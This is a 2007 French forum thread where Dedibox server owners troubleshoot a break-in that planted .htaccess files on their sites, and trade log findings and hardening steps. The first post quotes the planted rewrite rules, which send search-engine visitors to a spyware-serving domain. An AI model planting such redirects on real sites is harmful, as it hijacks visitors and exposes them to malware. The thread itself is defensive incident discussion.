DEDIBOX-NEWS.COM

Le Forum Non Officiel de la DEDIBOX

Vous n'êtes pas identifié.

#1 2007-08-24 14:44:09

ordimedia
Je débarque
Date d'inscription: 2007-08-24
Messages: 3

.htaccess sur rostoffhost

Bonjour, cela fait 2 fois deja en une semaine que tout les sites de mon serveur dedibox edition VHCS sont tous bloque a cause de .htaccess qui apparaisent a la racine de chacun d'eux

voici leurs contenue :
**** [START] ****
RewriteEngine on
Options +FollowSymLinks

RewriteCond %{HTTP_REFERER} ^.*(google|live|yahoo|ask|msn|aol|altavista).*$ [NC]
RewriteRule .*$ http://rostoffhost.info/strf/ [L]
**** [END] ****

n'alller pas sur l'adresse rostoffhost, ca vous colle un spyware

en suprimant ces .htaccess tout repart normalement mais j'aimerai bien comprendre.
Avez vous deja eu le soucis ?
Merci

en attendant je rechercher de mon cote et je vous tiendrez au courant

Hors ligne

 

#2 2007-08-24 14:51:55

maddanny
Membre d'honneur
Date d'inscription: 2006-10-20
Messages: 1247

Re: .htaccess sur rostoffhost

Felicitations, ça fait donc 1 semaine qu'on te pirate ...
Il faut trouver le script en question et le dégager, sans oublier de sécuriser ton serveur.


En Greve Jusqu'à la prochaine raison de faire greve ! :p

Hors ligne

 

#3 2007-08-24 15:08:30

Jérémy
Membres d'honneurs
Date d'inscription: 2006-05-17
Messages: 1153
Site web

Re: .htaccess sur rostoffhost

J'ai eu le souci sur une vieille install, nettoyage, archivage des sites, copies de tar , réinstall du serveur et c reparti

Hors ligne

 

#4 2007-08-24 15:37:15

ordimedia
Je débarque
Date d'inscription: 2007-08-24
Messages: 3

Re: .htaccess sur rostoffhost

maddanny a écrit:

Felicitations, ça fait donc 1 semaine qu'on te pirate ...

ca fait pas une semaine qu'on me pirate mais 2 fois en une semaine, nuance

je pensais avoir solutionné le probleme la premiere fois (je n'avez pas juste supprimer les fichiers...), desolé d'avoir fait une erreur et d'avoir demander de l'aide

Hors ligne

 

#5 2007-08-24 15:40:21

maddanny
Membre d'honneur
Date d'inscription: 2006-10-20
Messages: 1247

Re: .htaccess sur rostoffhost

Euh non l'erreur c'est que tu n'as pas encore trouvé la faille !
Et que ton install n'est pas sécurisée ...

Fais la liste des applis installées et chercher sur leurs forums si d'autres utilisateurs ont eu le probleme, ça te permettra de trouver + rapidement la solution.


En Greve Jusqu'à la prochaine raison de faire greve ! :p

Hors ligne

 

#6 2007-08-27 09:46:28

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Bonjour,

même problème, dedibox piratée et ajout de htaccess de redirection !!!

L'url rewriting n'était pas activé, donc je m'en suis aperçu à cause de l'erreur 500 ...

Est ce que quelqu'un peu expliquer (clairement) quel sont les logs à analyser pour comprendre ou se trouve la faille ?

Merci d'avance,

A+

Hors ligne

 

#7 2007-08-27 10:05:25

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Apparement, c'est peut être une faille dotclear ?

Est ce que tous ceux qui ont été piraté ont une install dotclear ?

J'ai rien trouvé dans les logs du serveur concernant un acces à mon dotclear a l'heure du piratage ...

http://www.dotclear.net/log/post/2006/0 … tClear-12x

Hors ligne

 

#8 2007-08-27 10:21:27

Jérémy
Membres d'honneurs
Date d'inscription: 2006-05-17
Messages: 1153
Site web

Re: .htaccess sur rostoffhost

non je n'utilise pas dotclear et j'ai eu ca également

Hors ligne

 

#9 2007-08-27 10:49:18

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Peut être un probléme avec vhcs alors ?

Je n'est pas trouvé les logs apache d'accès à vhcs, quelqu'un sait ou ils sont ?

Hors ligne

 

#10 2007-08-27 10:53:55

ordimedia
Je débarque
Date d'inscription: 2007-08-24
Messages: 3

Re: .htaccess sur rostoffhost

Ouais a mon avis c'est vhcs

je dit ca par ce que tout les site que j'ai creer via VHCS sur ce serveur on ete touché mais pas ceux que j'ai parametré a la main dans apache
pour le moment je ai protege vhcs avec un htaccess je v voir si ca suffi. j'a pas trouve de trace dans les logs ca m'ettone

Hors ligne

 

#11 2007-08-27 13:59:55

Corpo
Membre
Date d'inscription: 2006-05-04
Messages: 13

Re: .htaccess sur rostoffhost

J'ai eu droit a la même chose:

Ubuntu 7.04
Pas de dotclear, pas de VHCS

Regardez votre fichier auth.log dans /var/log
Vous verrez "Accepted password for root "... avec l'ip 205.234.141.155, en ssh2 ...

Je ne sais pas par où ils sont passés, mais j'ai un un accès ssh par site où a été rajouté le .htaccess
Ma distrib était et est a jour, je n'ai pas encore trouvé d'infos sur la source du problème

Sur le serveur, il y a, entre autres
Apache 2.2.4 compilé par mes soins, avec relativement peu de modules
Php 5.2.3 compilé par mes soins, avec le module php-suhosin (sécurité accrue)
Quelques Joomla, pas tous en dernière version
Un forum Invision 1.3.1 avec les derniers patchs de sécurité
Un serveur TrackMania Nations
Un serveur TeamSpeak (2.0.21 que j'ai upgradé depuis en dernière version)

Bon, j'ai viré tous les .htaccess véreux, et j'ai mis PermitRootLogin sur no dans /etc/sshd_config pour éviter qu'il ne puisse rerentrer en root via ssh.

Pas très rassurant tout ça sad

Alors il se passe quoi ? La base de passwords de dedibox a été hackée ?
Dans les logs je n'ai rien du tout a part les traces dans auth.log.
si je fais un "last root" je ne vois même pas les accès en question !!

Hors ligne

 

#12 2007-08-27 14:32:46

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Je sais pas comment ils ont fait, mais ça me rassure pas du tout !!!!

J'avais regardé mon fichier auth, mais le hacker a du effacer ces traces, parce que j'ai un gros vide dans la fin de journée du 23 alors que sinon j'ai de nombreuses tentatives d'acces refusé fin du 23 et le 24 .... :'(

Je vais limiter l'acces à mon ssh avec iptable ...

N'hésitez pas si vous avez d'autre chose à regarder pour voir ce qui c'est passé, ou plus d'info sur le problème....

A+

Hors ligne

 

#13 2007-08-27 14:34:38

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Y'a déjà au moins 4 ou 5 posts sur le forum ... je commence vraiment à me demander si c'est pas une faille du coté de dedibox !!!!

Hors ligne

 

#14 2007-08-27 16:11:52

Corpo
Membre
Date d'inscription: 2006-05-04
Messages: 13

Re: .htaccess sur rostoffhost

Vous avez quelle version de ProFTPD ?
http://www.addict3d.org/news/55191/ProF … dict3d.org

Hors ligne

 

#15 2007-08-27 16:20:19

maddanny
Membre d'honneur
Date d'inscription: 2006-10-20
Messages: 1247

Re: .htaccess sur rostoffhost

Corpo a écrit:

Vous avez quelle version de ProFTPD ?
http://www.addict3d.org/news/55191/ProF … dict3d.org

Visiblement cet exploit necessite déjà un acces local à la machine.


En Greve Jusqu'à la prochaine raison de faire greve ! :p

Hors ligne

 

#16 2007-08-27 16:32:24

Corpo
Membre
Date d'inscription: 2006-05-04
Messages: 13

Re: .htaccess sur rostoffhost

Heu ouais après lecture c'est une "simple" élévation de privilèges locaux ... bon, mauvaise pioche ... je continue de gratter, sans trop de convictions sad

Hors ligne

 

#17 2007-08-27 16:34:58

maddanny
Membre d'honneur
Date d'inscription: 2006-10-20
Messages: 1247

Re: .htaccess sur rostoffhost

Ce soir je veux bien jetter un coup d'oeil à 1 ou 2 dedibox infectées, si ça interesse qqun wink
Bon faudra me filer le root mais je suis un gentil smile smile smile


En Greve Jusqu'à la prochaine raison de faire greve ! :p

Hors ligne

 

#18 2007-08-27 16:59:30

ScHinZe
Eleveur de phacomochères
Lieu: Katmandou
Date d'inscription: 2006-08-04
Messages: 2578
Site web

Re: .htaccess sur rostoffhost

DaRkYoda a écrit:

Y'a déjà au moins 4 ou 5 posts sur le forum ... je commence vraiment à me demander si c'est pas une faille du coté de dedibox !!!!

looooool

Si t'as des dizaines de braqueurs de voitures qui s'acharnent à ne voler que des peugeot, doit on accuser peugeot pour autant ?

Dedibox loue des serveurs dédiés.

TU as installé un OS dessus.
TU es chargé de le sécurisé.
TU es responsable de toute nuisance liée à du piratage.
TU dois tenir tes softwares à jour.
TU ne peut t'en prendre qu'à toi si tu t'es fais hacké.

(Mes phrases ne sont pas des attaques personnelles, ça concerne tout le monde, moi compris ^^)


http://www.schinze.fr/_imgs/banniere.jpg

Hors ligne

 

#19 2007-08-27 17:05:53

DaRkYoda
Membre
Date d'inscription: 2006-11-16
Messages: 12

Re: .htaccess sur rostoffhost

Je suis d'accord, il manque un peu de smiley dans mon post, ct plus une boutade en liaison avec la remarque de Corpo : "Alors il se passe quoi ? La base de passwords de dedibox a été hackée ?"

Mais j'aimerais bien comprendre comment c'est produit le hack histoire de sécuriser la faille .... smile

Hors ligne

 

#20 2007-08-27 17:14:15

shamankick
Membres d'honneurs
Lieu: Paris
Date d'inscription: 2006-08-24
Messages: 948
Site web

Re: .htaccess sur rostoffhost

c'est Flying Jack il a la gueule de bois lol
un peu nerveux quoi, il a pas encore completement sécurisé la faille dans son crane..héhéhé

et bon anniversaire (en retard..)

Dernière modification par shamankick (2007-08-27 17:14:38)


[x_o]  http://www.sub-machine.net ||| http://www.subflow.net ----- NEWBIE BLING BLING
UID 5

Hors ligne

 

#21 2007-08-29 20:05:03

madcorp
Je débarque
Date d'inscription: 2007-08-29
Messages: 1

Re: .htaccess sur rostoffhost

Beaucoup de dedibox sont touchées...

Un topic sur ubuntu-fr.org est ouvert :
http://forum.ubuntu-fr.org/viewtopic.ph … 73&p=1

Une discussion sur les newsgroup de dedibox est ouverte :
proxad.dedibox.discussions / Attaque de serveur (ouverte le 24/08/2007)

Le problème ne vient pas de : prof-ftpd - spip - phpbb
Pour l'instant on ne sait pas d'ou il vient...

Hors ligne

 

#22 2007-08-29 21:09:18

sophana
Membre
Date d'inscription: 2006-07-28
Messages: 36

Re: .htaccess sur rostoffhost

C'est clair que c'est lie a dedibox!
Un acces root du premier coup c'est grave!
Sur le post du forum ubuntu, sur le log, on voit que le bot avait meme le nom et mdp du compte utilisateur (ce qui ne peut pas se deviner) et il a ensuite fait un bete su pour passer root.
Ma question est la suivante, pour l'install des dedibox ubuntu, est-ce que vous avez donne un nom d'utilisateur + mot de passe, ou bien vous avez eu un mot de passe root?

Pour ceux qui font des lecons, regardez bien si ces fichiers .htaccess sont la, car ca ne se voit pas, il redirige seulement les visites provenant des moteurs de recherches.

L'un des seuls recoupements est dedibox, toutes celles qui ont ete installees entre le debut de dedibox et il y a plusieurs mois, quand ils ont surement arrete de stocker les mots de passe.

Regardez bien sur google, personne ne parle d'une faille aussi grave sauf nous! Or si c'etait vrai (qu'une faille existe), on en parlerai au 20h!
J'ai une centos4 que je pensait bien protegee mais elle a ete hackee.
Je rappelle quand meme que centos 4 est une redhat entreprise utilisee par beaucoup de grosses boites.
S'il y a vait une telle faille ca ferait un scandale mondial.

TU ne peut t'en prendre qu'à toi si tu t'es fais hacké.

non, on peut s'en prendre a dedibox aussi.

Dernière modification par sophana (2007-08-29 21:10:16)

Hors ligne

 

#23 2007-08-29 21:41:53

Jérémy
Membres d'honneurs
Date d'inscription: 2006-05-17
Messages: 1153
Site web

Re: .htaccess sur rostoffhost

Personnelement j'ai opté pour :
désactivation du login root, je dois d'abord me loguer autrement
fail2ban installé
webmin viré (meme si je travail un systeme protégé pour l'activer / désactiver sur demande)

et pour le moment ca n'est pas revenu (en partant d'une install vhcs2 classique) (je n'ai pas protéger mon répertoire /vhcs2/ )

Hors ligne

 

#24 2007-08-29 23:02:24

maddanny
Membre d'honneur
Date d'inscription: 2006-10-20
Messages: 1247

Re: .htaccess sur rostoffhost

sophana a écrit:

C'est clair que c'est lie a dedibox!
Un acces root du premier coup c'est grave!

Et c'est quoi ta preuve ? Ton absolue certitude et confiance dans tes capacitées de sysadmin ?

Désolé mais jusqu'à la preuve du contraire Dedibox n'y est pour rien.


En Greve Jusqu'à la prochaine raison de faire greve ! :p

Hors ligne

 

#25 2007-08-30 00:21:31

Calimero
Maitre Jeidi
Lieu: 94 | 67
Date d'inscription: 2006-05-05
Messages: 2730

Re: .htaccess sur rostoffhost

Ah bon, root/root comme login/password c'est pas sikiour ? hmm

smilelolsmilecool

Hors ligne

 

Pied de page des forums

Powered by PunBB
© Copyright 2002–2005 Rickard Andersson